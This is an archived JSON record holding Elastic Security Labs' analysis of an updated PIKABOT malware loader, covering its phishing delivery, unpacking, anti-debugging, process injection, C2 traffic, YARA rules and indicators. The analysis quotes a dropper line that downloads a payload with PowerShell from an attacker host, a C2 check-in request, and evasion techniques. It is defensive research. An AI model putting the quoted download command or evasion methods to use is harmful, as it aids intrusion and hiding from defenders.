{
	"id": "6f2d910c-53c6-4ed0-9e2e-2c9b9dc415d1",
	"created_at": "2026-04-06T00:08:25.829197Z",
	"updated_at": "2026-04-10T03:24:23.621899Z",
	"deleted_at": null,
	"sha1_hash": "df2f9aea1c00d54aa200336802d200c57aaf80f3",
	"title": "PIKABOT, I choose you!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1100778,
	"plain_text": "PIKABOT, I choose you!\r\nBy Daniel Stepanic, Salim Bitam\r\nPublished: 2024-02-24 · Archived: 2026-04-05 18:32:04 UTC\r\nPIKABOT at a glance\r\nPIKABOT is a widely deployed loader malicious actors utilize to distribute payloads such as Cobalt Strike or launch\r\nransomware. On February 8th, the Elastic Security Labs team observed new PIKABOT campaigns, including an updated\r\nvariant. This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation. The core module has\r\nadded a new string decryption implementation, changes to obfuscation functionality, and various other modifications.\r\nThis post will highlight the initial campaign, break down the new loader functionality, and review the core components.\r\nThere are interesting design choices in this new update that we think are the start of a new codebase that will make\r\nfurther improvements over time. While the functionality is similar to previous builds, these new updates have likely\r\nbroken signatures and previous tooling.\r\nDuring the development of this research, the ThreatLabz team at Zscaler released great analysis and insights into a\r\nsample overlapping with those in this post. We suggest reading their work along with ours to understand these PIKABOT\r\nchanges comprehensively.\r\nKey takeaways\r\nFresh campaigns involving significant updates to the PIKABOT loader and core components\r\nPIKABOT loader uses a new unpacking technique of combining scattered chunks of encrypted data in base64\r\nformat from .data section\r\nChanges in the core include toned-down obfuscation and in-line RC4 functions, plaintext configuration at runtime,\r\nremoval of AES during network communications\r\nPIKABOT development appears as a work-in-progress, with future updates likely imminent\r\nCall-stack visibility using Elastic Security provides the ability to triage threats like PIKABOT rapidly\r\nPIKABOT campaign overview\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 1 of 20\n\nPIKABOT execution flow\r\nAs the new year started, PIKABOT distribution remained inactive until approximately two weeks ago. This new\r\ncampaign on February 8th involved emails with hyperlinks that led to ZIP archive files containing a malicious obfuscated\r\nJavascript script.\r\nObfuscated Javascript within ZIP archive\r\nBelow are the contents of the obfuscated JavaScript file, showing the next sequence to download and execute\r\nPIKABOT’s loader using PowerShell.\r\n// deobfuscated\r\nvar sites = ['https://gloverstech[.]com/tJWz9/', '', '']\r\nfor (var i = 0x0; i \u003c 3; i++)\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 2 of 20\n\n{\r\nvar obj = new ActiveXObject(\"WScript.Shell\")\r\nobj['Run'](\"powershell Invoke-WebRequest https://gloverstech[.]com/tJWz9/0.2343379541861872.dat -OutFile %SYST\r\n}\r\nPIKABOT loader\r\nLoader stage 1\r\nTo appear authentic, the developer tampered with a legitimate search and replace tool called grepWinNP3.exe from this\r\nrepository. Using our internal sandboxing project (Detonate) and leveraging Elastic Defend’s call stack feature provided a\r\ndetailed trace of the execution, allowing us to pinpoint the entry point of malicious code.\r\nAn analysis of the call stack data reveals that execution begins at a call before offset 0x81aa7 within the malicious file;\r\nthe execution then leaps to a memory allocation at a call prior to offset 0x25d84 . Furthermore, it was observed that the\r\nprocess creation call stack is missing normal calls to KernelBase.dll!CreateProcessInternalW and\r\nntdll.dll!NtCreateUserProcess , due to the use of a syscall via shellcode execution residing in the unbacked memory.\r\nBy using this implementation, it will bypass user-mode hooks on WOW64 modules to evade EDR products.\r\nAlert call stack for PIKABOT loader\r\nLooking into the offset 0x81aa7 of the malicious file and conducting a side-by-side code comparison with a verified,\r\nbenign version of the grepWinNP3.exe file, we identified something distinct and unusual: a hardcoded address to\r\nexecute the PIKABOT loader, this marks the entrypoint of the PIKABOT loader.\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 3 of 20\n\nEntrypoint to malicious code\r\nThe malicious code employs heavy obfuscation, utilizing a technique where a jump ( JMP ) follows each assembly\r\ninstruction. This approach significantly complicates analysis by disrupting the straightforward flow of execution.\r\nObfuscation involving a combination of instructions and jumps\r\nThe loader extracts its stage 2 payload from the .text section, where it is stored in chunks of 0x94 bytes, before\r\nconsolidating the pieces. It then employs a seemingly custom decryption algorithm, which utilizes bitwise operations.\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 4 of 20\n\nDecryption algorithm for stage 2 payload\r\nThe next step of the process is to reflectively load the PE file within the confines of the currently executing process. This\r\ntechnique involves dynamically loading the PE file's contents into memory and executing it, without the need for the file\r\nto be physically written to disk. This method not only streamlines the execution process by eliminating the necessity for\r\nexternal file interactions but also significantly enhances stealth by minimizing the digital footprint left on the host system.\r\nReflectively loading PE\r\nLoader stage 2\r\nThe stage 2 loader, tasked with initializing the PIKABOT core within a newly established process, employs a blend of\r\ncode and string obfuscation techniques similar to those found in the core itself. In addition to its obfuscation capabilities,\r\nthe loader incorporates a series of advanced anti-debugging countermeasures.\r\nAnti-debugging\r\nThe malware utilizes specific NTDLL Zw APIs for a variety of operations, including debugger detection, process\r\ncreation, and injection, aiming to stay under the radar of detection mechanisms and evade EDR (Endpoint Detection and\r\nResponse) user-land hooking, as well as debugging attempts.\r\nIt executes syscalls directly, bypassing conventional API calls that are more susceptible to monitoring and interception. It\r\nuses a wrapper function that facilitates the execution of syscalls in 64-bit mode which takes a hash of a Zw API name as\r\na parameter.\r\nFunction used to execute syscall by hash\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 5 of 20\n\nThe wrapper function extracts the syscall ID by parsing the loaded NTDLL and matching the hash of the Zw function\r\nname. After finding the correct syscall ID, it uses the Wow64Transition Windows API to execute the syscall in 64-bit\r\nmode.\r\nControl flow graph showing syscall passed to WoW64Transition\r\nNote that the parameters needed are pushed on the stack before the wrapper is called, the following example showcases a\r\nZwQueryInformationProcess call with the ProcessInformationClass set to ProcessDebugPort (7):\r\nSyscall parameters pushed on stack\r\nThe malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic\r\ntools. These techniques include:\r\nCalling ZwQuerySystemInformation with the SystemKernelDebuggerInformation parameter to detect the\r\npresence of kernel debuggers.\r\nCalling ZwQueryInformationProcess with the ProcessInformationClass set to ProcessDebugPort to identify\r\nany debugging ports associated with the process.\r\nCalling ZwQueryInformationProcess again, but with the ProcessInformationClass set to ProcessDebugFlags\r\nparameter, to ascertain if the process has been flagged for debugging.\r\nInspecting the Process Environment Block (PEB) for the BeingDebugged flag, which indicates if the process is\r\ncurrently being debugged.\r\nUsing GetThreadContext to detect hardware breakpoints. Scanning the list of currently running processes to\r\nidentify any active debugging or forensic tools.\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 6 of 20\n\nDecompilation of debugging checks\r\nInterestingly, we discovered a bug where some of the process names it checks have their first byte zeroed out, this could\r\nsuggest a mistake by the malware’s author or an unwanted side-effect added by the obfuscation tool. The full list of\r\nprocess names that are checked can be found at the end of this article.\r\nProcess names with missing first byte\r\nExecution\r\nThe loader populates a global variable with the addresses of essential APIs from the NTDLL and KERNEL32 libraries.\r\nThis step is pivotal for the malware's operation, as these addresses are required for executing subsequent tasks. Note that\r\nthe loader employs a distinct API name hashing algorithm, diverging from the one previously used for Zw APIs.\r\nAPIs retrieved for loading core component\r\nBelow is the reconstructed structure:\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 7 of 20\n\nstruct global_variable\r\n{\r\n int debugger_detected;\r\n void* LdrLoadDll;\r\n void* LdrGetProcedureAddress;\r\n void* RtlAllocateHeap;\r\n void* RtlFreeHeap;\r\n void* RtlDecompressBuffer;\r\n void* RtlCreateProcessParametersEx;\r\n void* RtlDestroyProcessParameters;\r\n void* ExitProcess;\r\n void* CheckRemoteDebuggerPresent;\r\n void* VirtualAlloc;\r\n void* GetThreadContext;\r\n void* VirtualFree;\r\n void* CreateToolhelp32Snapshot;\r\n void* Process32FirstW;\r\n void* Process32NextW;\r\n void* ntdll_module;\r\n void* kernel32_dll;\r\n int field_48;\r\n uint8_t* ptr_decrypted_PIKABOT_core;\r\n int decrypted_PIKABOT_core_size;\r\n TEB* TEB;\r\n};\r\nLoader structure\r\nThe malware then consolidates bytes of the PIKABOT core that are scattered in the .data section in base64-encoded\r\nchunks, which is noteworthy when compared to a previous version which loaded a set of PNGs from its resources\r\nsection.\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 8 of 20\n\nFunctions used to retrieve core payload in chunks\r\nIt executes a sequence of nine distinct functions, each performing similar operations but with varying arguments. Each\r\nfunction decrypts an RC4 key using an in-line process that utilizes strings that appear legitimate. The function then\r\nbase64 decodes each chunk before decrypting the bytes.\r\nDecryption functions using RC4 and base64\r\nAfter consolidating the decrypted bytes, it uses the RtlDecompressBuffer API to decompress them.\r\nPIKABOT loader using decompression function\r\nThe loader creates a suspended instance of ctfmon.exe using the ZwCreateUserProcess syscall, a tactic designed to\r\nmasquerade as a legitimate Windows process. Next, it allocates a large memory region remotely via the\r\nZwAllocateVirtualMemory syscall to house the PIKABOT core's PE file.\r\nSubsequently, the loader writes the PIKABOT core into the newly allocated memory area using the\r\nZwWriteVirtualMemory syscall. It then redirects the execution flow from ctfmon.exe to the malicious PIKABOT core\r\nby calling the SetContextThread API to change the thread's execution address. Finally, it resumes the thread with\r\nZwResumeThread syscall.\r\nSyscall execution of core payload\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 9 of 20\n\nPIKABOT core\r\nThe overall behavior and functionality of the updated PIKABOT core are similar to previous versions: the bot collects\r\ninitial data from the victim machine and presents the threat actor with command and control access to enable post-compromise behavior such as command-line execution, discovery, or launching additional payloads through injection.\r\nThe notable differences include:\r\nNew style of obfuscation with fewer in-line functions\r\nMultiple implementations for decrypting strings\r\nPlaintext configuration at runtime, removal of JSON format\r\nNetwork communication uses RC4 plus byte swapping, removal of AES\r\nObfuscation\r\nOne of the most apparent differences is centered around the obfuscation of PIKABOT. This version contains a drastically\r\nless obfuscated binary but provides a familiar feel to older versions. Instead of a barrage of in-line RC4 functions, there\r\nare only a few left after the new update. Unfortunately, there is still a great deal of obfuscation applied to global variables\r\nand junk instructions.\r\nBelow is a typical example of junk code being inserted in between the actual malware’s code, solely to extend analysis\r\ntime and add confusion.\r\nObfuscation using global variables\r\nString Decryption\r\nAs mentioned previously, there are still some in-line RC4 functions used to decrypt strings. In previous versions, the core\r\nused base64 encoding as an additional step in combination with using AES and RC4 to obscure the strings; in this core\r\nversion, we haven’t seen base64 encoding or AES used for string decryption.\r\nHere’s an instance of a remaining in-line RC4 function used to decrypt the hardcoded mutex. In this version, PIKABOT\r\ncontinues its trademark use of legitimate strings as the RC4 key to decrypt data.\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 10 of 20\n\nIn-line RC4\r\nString decryption using RC4 with benign strings\r\nIn this new version, PIKABOT includes a different implementation for string obfuscation by using stack strings and\r\nplacing individual characters into an array in a randomized order. Below is an example using netapi32.dll :\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 11 of 20\n\nStack string placement using netapi32.dll\r\nAnti-debugging\r\nIn terms of anti-debugging in this version, PIKABOT checks the BeingDebuggedFlag in the PEB along with using\r\nCheckRemoteDebuggerPresent . In our sample, a hardcoded value ( 0x2500 ) is returned if a debugger is attached. These\r\nchecks unfortunately are not in a single place, but scattered in different places throughout the binary, for example right\r\nbefore network requests are made.\r\nDebugger check\r\nExecution\r\nRegarding execution and overall behaviors, PIKABOT’s core closely follows the execution flow of older versions. Upon\r\nexecution, PIKABOT parses the PEB and uses API hashing to resolve needed libraries at runtime. Next, it validates the\r\nvictim machine by verifying the language identifier using GetUserDefaultLangID . If the LangID is set to Russian\r\n( 0x419 ) or Ukranian ( 0x422 ), the malware will immediately stop its execution.\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 12 of 20\n\nLanguage check\r\nAfter the language check, PIKABOT creates a mutex to prevent reinfection on the same machine. Our sample used the\r\nfollowing mutex: {6F70D3AF-34EF-433C-A803-E83654F6FD7C}\r\nNext, the malware will generate a UUID from the victim machine using the system volume number in combination with\r\nthe hostname and username. PIKABOT will then generate a unique RC4 key seeded by RtlRandomEx and then place the\r\nkey into the config structure to be used later during its network communications.\r\nInitial Collection\r\nThe next phase involves collecting victim machine information and placing the data into a custom structure that will then\r\nbe encrypted and sent out after the initial check-in request. The following actions are used to fingerprint and identify the\r\nvictim and their network:\r\nRetrieves the name of the user associated with the PIKABOT thread\r\nRetrieves the computer name\r\nGets processor information\r\nGrabs display device information using EnumDisplayDevicesW\r\nRetrieves domain controller information using DsGetDcNameW\r\nCollects current usage around physical and virtual memory using GlobalMemoryStatusEx\r\nGets the window dimensions using GetWindowRect used to identify sandbox environments\r\nRetrieves Windows OS product information using RtlGetVersion\r\nUses CreateToolhelp32Snapshot to retrieve process information\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 13 of 20\n\nVictim information retrieved such as username, computer name, etc\r\nConfig\r\nOne strange development decision in this new version is around the malware configuration. At runtime, the configuration\r\nis in plaintext and located in one spot in memory. This does eventually get erased in memory. We believe this will only\r\ntemporarily last as previous versions protected the configuration and it has become a standard expectation when dealing\r\nwith prevalent malware families.\r\nConfiguration in plaintext at core runtime\r\nNetwork\r\nPIKABOT performs network communication over HTTPS on non-traditional ports (2967, 2223, etc) using User-Agent\r\nMicrosoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro) . The build number of the PIKABOT\r\ncore module is concatenated together from the config and can be found being passed within the encrypted network\r\nrequests, the version we analyzed is labeled as 1.8.32-beta .\r\nNew PIKABOT version on the stack\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 14 of 20\n\nOn this initial check-in request to the C2 server, PIKABOT registers the bot while sending the previously collected\r\ninformation encrypted with RC4. The RC4 key is sent in this initial packet at offset ( 0x10 ). As mentioned previously,\r\nPIKABOT no longer uses AES in its network communications.\r\nPOST https://158.220.80.167:2967/api/admin.teams.settings.setIcon HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.8\r\nUser-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)\r\nContent-Length: 6778\r\nHost: 158.220.80.167:2967\r\n00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b\r\nPIKABOT initial check-in request\r\nFor each outbound network request, PIKABOT randomly chooses one of the following URI’s:\r\n/api/admin.conversations.convertToPrivate\r\n/api/admin.conversations.getConversationPrefs\r\n/api/admin.conversations.restrictAccess.removeGroup\r\n/api/admin.emoji.add\r\n/api/admin.emoji.addAlias\r\n/api/admin.emoji.list\r\n/api/admin.inviteRequests.approved.list\r\n/api/admin.teams.admins.list\r\n/api/admin.teams.settings.setIcon\r\n/api/admin.usergroups.addTeams\r\n/api/admin.users.session.reset\r\n/api/apps.permissions.users.list\r\nList of URI’s used in PIKABOT C2 requests\r\nUnlike previous versions by which victim data was placed in a structured format using JSON, the data within these\r\nrequests are raw bytes. The first 16 bytes are used to pass specific config information (bot command ID, byte shift, etc).\r\nThe next 32-bytes embed the RC4 key for the session where then the encrypted data is followed in the request.\r\nThere is one additional transformation where the developers added a random shift of bytes that occurs at runtime. This\r\nnumber ( 0x18 ) at offset ( 0xF ) in the example request below represents the number of bytes to shift from the end of the\r\nencrypted data to the start of the encrypted data. In our example, to successfully decrypt the data, the last 18 bytes would\r\nneed to be placed in front of bytes ( 0xDA 0x9E ).\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 15 of 20\n\nHex view of network request on initial check-in\r\nBot Functionality\r\nIn terms of the core bot functionality, it is similar to previous versions: executing commands, performing discovery, as\r\nwell as process injection capabilities. From our perspective, it still seems very much like a work in progress. One\r\ncommand ID ( 0x982 ) is an empty function, in another case, there are three unique command ID’s pointed to the same\r\nfunction. These indicate that this software is not quite complete.\r\nCommand ID Description\r\n0x1FED Beacon timeout\r\n0x1A5A Exits the PIKABOT process\r\n0x2672 Includes obfuscation, but appears to not do anything meaningful\r\n0x246F Creates file on disk and modifies registry tied to configuration\r\n0xACB Command-line execution with output\r\n0x36C PE inject in a remote process\r\n0x792 Shellcode inject in a remote process\r\n0x359, 0x3A6, 0x240 Command-line execution similar to 0xACB, uses custom error code (0x1B3)\r\n0x985 Process enumeration, similar to initial victim collection enumeration\r\n0x982 Empty function\r\nMalware and MITRE ATT\u0026CK\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 16 of 20\n\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nTactics\r\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an\r\naction.\r\nInitial Access\r\nExecution\r\nDefense Evasion\r\nDiscovery\r\nCommand and Control\r\nExfiltration\r\nTechniques\r\nTechniques represent how an adversary achieves a tactical goal by performing an action.\r\nPhishing\r\nUser Execution: Malicious Link\r\nReflective Code Loading\r\nSystem Information Discovery\r\nProcess Injection\r\nEncrypted Channel\r\nDetecting malware\r\nPrevention\r\nNetwork Module Loaded from Suspicious Unbacked Memory\r\nShellcode Execution from Low Reputation Module\r\nSuspicious Memory Write to a Remote Process\r\nSuspicious Remote Memory Allocation\r\nProcess Creation with Unusual Mitigation\r\nWindows.Trojan.PikaBot\r\nYARA\r\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify PIKABOT:\r\nrule Windows_Trojan_Pikabot_5441f511 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-02-15\"\r\n last_modified = \"2024-02-15\"\r\n license = \"Elastic License v2\"\r\n description = \"Related to PIKABOT core\"\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 17 of 20\n\nos = \"Windows\"\r\n arch = \"x86\"\r\n threat_name = \"Windows.Trojan.PIKABOT\"\r\n strings:\r\n $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 }\r\n $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 }\r\n $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? }\r\n $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 }\r\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 6\r\n $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 8\r\n condition:\r\n 2 of them\r\n}\r\nrule Windows_Trojan_Pikabot_95db8b5a {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-02-15\"\r\n last_modified = \"2024-02-15\"\r\n license = \"Elastic License v2\"\r\n description = \"Related to PIKABOT loader\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n threat_name = \"Windows.Trojan.PIKABOT\"\r\n strings:\r\n $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF }\r\n $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF }\r\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 6\r\n $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D\r\n $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55\r\n condition:\r\n 2 of them\r\n}\r\nObservations\r\nAll observables are also available for download in both ECS and STIX format.\r\nThe following observables were discussed in this research.\r\nObservable Type Name Reference\r\n2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b\r\nSHA-256\r\nOpc.zip\r\nZip\r\narchive\r\nholding\r\nobfuscated\r\nJavascript\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 18 of 20\n\nObservable Type Name Reference\r\nca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d\r\nSHA-256\r\ngrepWinNP3.exe\r\nPIKABOT\r\nloader\r\n139.84.237[.]229:2967\r\nipv4-\r\naddr\r\nPIKABOT\r\nC2 server\r\n85.239.243[.]155:5000\r\nipv4-\r\naddr\r\nPIKABOT\r\nC2 server\r\n104.129.55[.]104:2223\r\nipv4-\r\naddr\r\nPIKABOT\r\nC2 server\r\n37.60.242[.]85:9785\r\nipv4-\r\naddr\r\nPIKABOT\r\nC2 server\r\n95.179.191[.]137:5938\r\nipv4-\r\naddr\r\nPIKABOT\r\nC2 server\r\n65.20.66[.]218:5938\r\nipv4-\r\naddr\r\nPIKABOT C2\r\nserver\r\n158.220.80[.]157:9785\r\nipv4-\r\naddr\r\nPIKABOT C2\r\nserver\r\n104.129.55[.]103:2224\r\nipv4-\r\naddr\r\nPIKABOT C2\r\nserver\r\n158.220.80[.]167:2967\r\nipv4-\r\naddr\r\nPIKABOT C2\r\nserver\r\nentrevientos.com[.]ar domain\r\nHosting\r\ninfra for\r\nzip\r\narchive\r\ngloverstech[.]com domain\r\nHosting\r\ninfra for\r\nPIKABOT\r\nloader\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.zscaler.com/blogs/security-research/d-evolution-PIKABOT\r\nhttps://x.com/Cryptolaemus1/status/1755655639370514595?s=20\r\nAppendix\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 19 of 20\n\nProcess Name Checks\r\ntcpview.exe\r\nfilemon.exe\r\nautoruns.exe\r\nautorunsc.exe\r\nProcessHacker.exe\r\nprocmon.exe\r\nprocexp.exe\r\nidaq.exe\r\nregmon.exe\r\nidaq64.exe\r\nx32dbg.exe\r\nx64dbg.exe\r\nFiddler.exe\r\nhttpdebugger.exe\r\ncheatengine-i386.exe\r\ncheatengine-x86_64.exe\r\ncheatengine-x86_64-SSE4-AVX2.exe\r\nPETools.exe\r\nLordPE.exe\r\nSysInspector.exe\r\nproc_analyzer.exe\r\nsysAnalyzer.exe\r\nsniff_hit.exe\r\nwindbg.exe\r\njoeboxcontrol.exe\r\njoeboxserver.exe\r\nResourceHacker.exe\r\nImmunityDebugger.exe\r\nWireshark.exe\r\ndumpcap.exe\r\nHookExplorer.exe\r\nImportREC.exe\r\nSource: https://www.elastic.co/security-labs/pikabot-i-choose-you\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.elastic.co/security-labs/pikabot-i-choose-you"
	],
	"report_names": [
		"pikabot-i-choose-you"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434105,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/df2f9aea1c00d54aa200336802d200c57aaf80f3.pdf",
		"text": "https://archive.orkl.eu/df2f9aea1c00d54aa200336802d200c57aaf80f3.txt",
		"img": "https://archive.orkl.eu/df2f9aea1c00d54aa200336802d200c57aaf80f3.jpg"
	}
}